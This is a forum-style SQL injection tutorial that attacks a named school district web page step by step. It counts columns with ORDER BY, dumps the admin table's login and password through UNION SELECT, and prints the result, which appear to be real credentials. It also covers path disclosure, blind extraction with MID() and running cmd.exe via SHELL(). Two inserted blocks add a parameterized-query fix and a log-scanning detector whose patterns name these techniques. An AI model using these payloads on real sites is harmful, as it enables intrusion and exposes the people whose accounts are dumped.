site link for this tutorial
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151
how do we know it's vulnerable? like a regular injection: type ' at the end of the value.
first, i noticed that there are some people who don't know why the resulting error happens.
Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151'
error 80040e14
so, the explanation:
the coder expects that we use numbers only,
for example
id=10
id=7
id=234984
or letters
cat_id=index
cat_id=cars
or both
id=car1
A-Z 0-9
but he didn't expect that we use ' ,
because there is no
id=46'78
id=t'6'8'jh
so this error happens (the value goes straight into the sql query, and the db can't parse the unexpected character). instead of ' we can also type @, for example
id=1@
or ^
same principle.
after we understood that, let's move on.
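added example, not from the original post: the coder's side of the error explained above, in python. the table name Schools and the column SiteID are assumptions (the real page's query is not shown); the vulnerable builder pastes the value into the SQL the way the explanation describes, and the safe builder allowlists digits and binds the value with an ODBC-style ? placeholder, which is how an ADODB.Command or pyodbc call would take it.

```python
import re

# Assumed names: the tutorial never shows the real query.
TABLE = "Schools"
KEY_COLUMN = "SiteID"


def build_query_vulnerable(site: str) -> str:
    """The shape of the bug: the parameter is concatenated into the SQL text.

    Any character the coder did not expect (' @ ^, a space followed by a
    keyword) becomes part of the statement, which is why Jet answers with a
    syntax error instead of a result."""
    return "SELECT * FROM " + TABLE + " WHERE " + KEY_COLUMN + " = " + site


# The coder expects digits only, so the allowlist can be that strict.
SITE_RE = re.compile(r"[0-9]{1,8}")


def site_is_valid(site: str) -> bool:
    """True only for a short run of digits; everything else is refused."""
    return SITE_RE.fullmatch(site) is not None


def build_query_safe(site: str):
    """Allowlist check plus a placeholder instead of concatenation.

    Returns (sql, params). The value is handed to the driver separately and
    never becomes SQL text, so quotes, ORDER BY or UNION in the input cannot
    change the statement. The value is bound as the string it was received
    as, so a leading zero (Site=0151) survives whatever the column type is."""
    if not site_is_valid(site):
        raise ValueError("Site must be 1-8 digits")
    sql = "SELECT * FROM " + TABLE + " WHERE " + KEY_COLUMN + " = ?"
    return sql, (site,)


# Constructed inputs: the legitimate value and the probes from the tutorial.
PROBES = ["0151'", "1@", "1^", "0151 order by 68", "0151 UNION SELECT 1"]


def classify(inputs):
    """Map each input to 'accepted' or 'rejected' under the safe builder."""
    verdicts = {}
    for value in inputs:
        try:
            build_query_safe(value)
            verdicts[value] = "accepted"
        except ValueError:
            verdicts[value] = "rejected"
    return verdicts


if __name__ == "__main__":
    # The vulnerable builder makes the cause of error 80040e14 visible: an
    # unbalanced quote sitting inside the WHERE clause.
    print(build_query_vulnerable("0151'"))
    for value, verdict in classify(["0151"] + PROBES).items():
        print(f"{value!r:24} {verdict}")
```

the allowlist alone would already stop every request in this tutorial, but the placeholder is the real fix: it still holds when someone later widens the allowlist to letters (cat_id=cars) and forgets about quotes.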
in access we can count the columns with order by / group by.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+68
error 80004005, so there are no 68 columns in the table.
let's try 67
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+order+by+67
page loads normally, so there are 67 columns.
Code:
www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67%00
"Query input must contain at least one table or query."
it's ok!!
it means we got the column count right, but an access db is like mysql 4 (no information_schema to list things), so we have to guess the table and column names.
like this:
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from login%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from users%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
page loads normally, so the admin table exists.
as you can see, column 4 is the vulnerable one (its value is printed on the page), so let's inject there.
we have to guess the column names.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
no error, so the column exists.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
no error, so the column exists.
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
error
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 from admin%00
no error, so the column exists.
columns: admin_id, admin_login, admin_password.
in access we can't use concat(), so we use & instead (url-encoded as %26).
so
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1,2,3,admin_id+%26+0x3a+%26+admin_password+%26+0x3a+%26+admin_login,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67+from+admin%00
output is:
1:Powell:Karin
some comments:
-limit doesn't exist, so we use TOP X instead.
UNION SELECT TOP 1 PASS FROM USER
-to find the full path, we query a db file that doesn't exist, like this:
Code:
http://www.sdhc.k12.fl.us/Schools/School_Info.asp?Site=0151+UNION+SELECT+1+FROM+X.X
the error message gives away the server path:
c:\windows\system32\inetsrv\X.mdb
-we can run subqueries like this:
AND (SELECT TOP 1 data FROM table)%00
-for blind injection, instead of substring() we use MID():
UNION SELECT MID(benzi,1,1) FROM table%00
returns b
UNION SELECT MID(benzi,2,1) FROM table%00
returns e.
-we can run shell commands like this:
AND SHELL('cmd.exe /c command ')%00
(if you wanna get root with shell())
but it's rare that SHELL() will be available, because the admin can block this function.
-the function curdir() returns the current directory.
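added example, not from the original post: a detection script for the access/jet tricks listed in this tutorial (quote probe, order by counting, UNION SELECT, %00 truncation, & concat, TOP, MID(), SHELL(), CURDIR(), the X.X path probe), run over a few constructed IIS W3C log lines. the field order, the request path, the timestamps and the client address are all made up; the field order follows the usual IIS default #Fields: header, so check yours before pointing this at a real log.

```python
import re
from urllib.parse import unquote_plus

# Assumed field order (the common IIS W3C default); read your own header.
FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
          "s-port", "cs-username", "c-ip", "cs(User-Agent)", "sc-status"]

# One rule per technique from the tutorial. They run against the URL-decoded
# query string, because IIS logs it as received (+ for space, %26, %00 ...).
RULES = [
    ("quote-probe",  re.compile(r"['@^]\s*$")),                   # Site=0151'
    ("order-by",     re.compile(r"\border\s+by\s+\d+", re.I)),    # column counting
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
    ("null-byte",    re.compile(r"\x00")),                        # %00 cuts the real query
    ("jet-concat",   re.compile(r"&\s*(0x3a|':')\s*&", re.I)),    # & instead of concat()
    ("top-n",        re.compile(r"\bselect\s+top\s+\d+", re.I)),  # TOP instead of LIMIT
    ("mid-blind",    re.compile(r"\bmid\s*\(", re.I)),            # MID() instead of substring
    ("shell-call",   re.compile(r"\bshell\s*\(", re.I)),
    ("curdir-call",  re.compile(r"\bcurdir\s*\(", re.I)),
    ("path-probe",   re.compile(r"\bfrom\s+\w+\.\w+", re.I)),     # FROM X.X path disclosure
]

# Constructed log lines: one clean request, then the tutorial's steps in order.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2010-03-01 10:00:00 10.0.0.5 GET /info.asp Site=0151 80 - 203.0.113.7 Mozilla/4.0 200",
    "2010-03-01 10:00:05 10.0.0.5 GET /info.asp Site=0151' 80 - 203.0.113.7 Mozilla/4.0 500",
    "2010-03-01 10:00:09 10.0.0.5 GET /info.asp Site=0151+order+by+68 80 - 203.0.113.7 Mozilla/4.0 500",
    "2010-03-01 10:00:20 10.0.0.5 GET /info.asp Site=0151+UNION+SELECT+1,2,3,admin_id+%26+0x3a+%26+admin_password,5+from+admin%00 80 - 203.0.113.7 Mozilla/4.0 200",
    "2010-03-01 10:00:31 10.0.0.5 GET /info.asp Site=0151+UNION+SELECT+1+FROM+X.X 80 - 203.0.113.7 Mozilla/4.0 500",
    "2010-03-01 10:00:40 10.0.0.5 GET /info.asp Site=0151+AND+SHELL('cmd.exe+/c+command+')%00 80 - 203.0.113.7 Mozilla/4.0 500",
]


def parse_line(line):
    """Split one log line into a dict keyed by FIELDS; None for headers/junk."""
    if line.startswith("#") or not line.strip():
        return None
    parts = line.split(" ")
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def scan_line(line):
    """Decode the query string and list the rules that fire on it."""
    rec = parse_line(line)
    if rec is None:
        return None
    query = unquote_plus(rec["cs-uri-query"])
    return {
        "time": rec["time"],
        "client": rec["c-ip"],
        "status": rec["sc-status"],   # the 80040e14 / 80004005 errors show up as 500
        "hits": [name for name, rx in RULES if rx.search(query)],
    }


def scan(lines):
    """Alerts for every line with at least one hit, in log order."""
    alerts = []
    for line in lines:
        res = scan_line(line)
        if res and res["hits"]:
            alerts.append(res)
    return alerts


def per_client_counts(alerts):
    """Flagged requests per client: the guessing in the tutorial is many
    requests from one address, so a count is the simplest escalation rule."""
    counts = {}
    for a in alerts:
        counts[a["client"]] = counts.get(a["client"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(a["time"], a["client"], a["status"], ",".join(a["hits"]))
    print(per_client_counts(found))
```

decoding first matters: the & is logged as %26 and the null byte as %00, so a rule written against the raw field would miss them, and the + for space hides "order by" from a naive grep.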
some cheat sheets
http://www.krazl.com/blog/index.php/ms-a...eat-sheet/
http://nibblesec.org/files/MSAccessSQLi/...sSQLi.html
hope you like this...